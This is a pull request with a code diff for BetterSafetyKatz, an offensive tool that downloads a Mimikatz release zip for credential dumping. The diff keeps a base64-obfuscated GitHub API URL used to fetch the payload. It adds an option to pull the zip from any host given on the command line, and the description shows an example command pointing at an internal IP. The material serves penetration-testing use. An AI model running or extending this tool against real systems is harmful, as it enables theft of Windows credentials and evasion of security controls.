### PR TITLE
Add command line custom URL option

### DIFF
--- a/SafetyKatz/Program.cs
+++ b/SafetyKatz/Program.cs
@@ -42,6 +42,7 @@ namespace BetterSafetyKatz
                     Console.WriteLine("[X] Process is not 64-bit, this version of katz won't work yo'!");
                     return;
                 }
+                string latestUrl;
 
 
                 // @Arno0x
@@ -59,18 +60,24 @@ namespace BetterSafetyKatz
                 //headers needed for the github API to answer back
                 webClient.Headers.Set("User-Agent", "request");
 
-         
-                //Ask the API for the latest releases, should prob be async but lazy
-                string latestReleases = webClient.DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA==")));
+                if (args.Length != 0)
+                {
+                    latestUrl = args[0];
+                    Console.WriteLine("[+] Downloading");
+                }
+                else
+                {
+                    //Ask the API for the latest releases, should prob be async but lazy
+                    string latestReleases = webClient.DownloadString(Encoding.UTF8.GetString(Convert.FromBase64String("aHR0cHM6Ly9hcGkuZ2l0aHViLmNvbS9yZXBvcy9nZW50aWxraXdpL21pbWlrYXR6L3JlbGVhc2VzL2xhdGVzdA==")));
 
-                //Regex out the latest url for the zip build of katz
-                Regex urlRegex = new Regex(@"https:\/\/github.com\/([a-z\.-]*)\/([a-z\.-]*)\/releases\/download\/([0-9\.-]*)\/([a-z\.-]*)_trunk\.zip", RegexOptions.IgnoreCase);
+                    //Regex out the latest url for the zip build of katz
+                    Regex urlRegex = new Regex(@"https:\/\/github.com\/([a-z\.-]*)\/([a-z\.-]*)\/releases\/download\/([0-9\.-]*)\/([a-z\.-]*)_trunk\.zip", RegexOptions.IgnoreCase);
 
-                //Pull the latest release as a ZIP file
-                string latestUrl = urlRegex.Matches(latestReleases)[0].ToString();
+                    //Pull the latest release as a ZIP file
+                    latestUrl = urlRegex.Matches(latestReleases)[0].ToString();
+                    Console.WriteLine("[+] Contacting repo -> " + latestUrl.Split(new string[] { "download/" }, StringSplitOptions.None)[1]);
+                }
 
-
-                Console.WriteLine("[+] Contacting repo -> " + latestUrl.Split(new string[] { "download/" }, StringSplitOptions.None)[1]);
 
                 //Download that
                 byte[] zipStream = webClient.DownloadData(latestUrl);


### PR DESCRIPTION
If BSK is called with `BetterSafetyKatz.exe http://10.10.10.11/mimikatz_trunk.zip` it will download from there rather than the official Github, useful for contexts where the internet can't be accessed.